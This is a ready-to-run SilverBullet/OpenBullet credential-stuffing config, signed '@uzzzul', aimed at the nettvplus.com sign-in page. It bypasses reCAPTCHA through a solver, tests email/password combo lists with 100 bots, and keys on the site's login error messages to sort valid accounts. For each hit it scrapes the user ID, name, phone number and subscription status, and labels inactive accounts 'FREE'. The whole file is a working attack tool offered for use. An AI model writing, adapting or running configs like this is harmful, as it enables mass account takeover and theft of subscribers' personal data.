[SETTINGS]
{
  "Name": "nettv",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-28T02:11:49.0010761+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "nettv",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#CAPTCHA SOLVECAPTCHA ReCaptchaV2 "6Le7BLMUAAAAAOykdl9QmL7LH_UwopjgY0HFibBP" "https://moj.nettvplus.com/signin" 

#LOGIN REQUEST POST "https://moj.nettvplus.com/signin" 
  CONTENT "username=<USER>&password=<PASS>&rememberMe=false&g-recaptcha-response=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: moj.nettvplus.com" 
  HEADER "Origin: https://moj.nettvplus.com" 
  HEADER "Referer: https://moj.nettvplus.com/signin" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Username or password is incorrect" 
    KEY "Korisničko ime ili lozinka nisu tačni" 
    KEY "he request has not been applied because it lacks valid authentication credentials for the target resource." 
  KEYCHAIN Success OR 
    KEY "{\"authorities\":" 

#userId PARSE "<SOURCE>" JSON "userId" CreateEmpty=FALSE -> CAP "userId" 

#firstName PARSE "<SOURCE>" JSON "firstName" CreateEmpty=FALSE -> CAP "firstName" 

#lastName PARSE "<SOURCE>" JSON "lastName" CreateEmpty=FALSE -> CAP "lastName" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "countryCode" 

#phoneNumber PARSE "<SOURCE>" JSON "phoneNumber" CreateEmpty=FALSE -> CAP "phoneNumber" 

#subscriptionStatus PARSE "<SOURCE>" JSON "subscriptionStatus" CreateEmpty=FALSE -> CAP "subscriptionStatus" 

#FREE KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<subscriptionStatus>" DoesNotContain "inactive" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<subscriptionStatus>" Contains "inactive" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

